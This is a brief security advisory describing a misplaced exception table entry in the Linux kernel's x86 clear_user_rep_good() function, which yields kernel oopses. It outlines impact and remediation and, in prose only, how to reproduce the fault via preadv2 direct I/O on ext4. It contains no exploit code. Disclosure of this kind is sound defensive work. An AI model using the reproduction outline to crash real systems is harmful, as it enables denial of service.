Linux Kernel Exception Handling Vulnerability in Memory Clearing Function

A vulnerability has been identified in the Linux kernel's handling of user memory clearing operations, specifically within the x86 architecture. The issue arises in the 'clear_user_rep_good()' function, where the exception table annotation was incorrectly placed. Instead of directing to the instruction that accessed user space, it pointed to a preceding register move. This misalignment means that if a user access exception occurs, the handler may not correctly identify the instruction, leading to a kernel oops report instead of the expected error handling. The vulnerability was introduced by a previous optimization that removed proper exception handling for user memory operations.

Impact

Exploitation of this vulnerability can cause a kernel oops report, indicating a failure to properly handle a page fault exception. This can be misinterpreted as a filesystem error, obscuring the root cause of the issue.

Reproduction

The vulnerability can be reproduced by invoking the 'preadv2' system call, which triggers the 'clear_user_rep_good()' function. This operation can be performed through a direct I/O read iteration on an ext4 file system, which will expose the incorrect exception handling by causing a page fault that is not properly managed, resulting in a kernel oops.

Remediation

Users can apply the latest patches from the Linux kernel stable tree to address this vulnerability.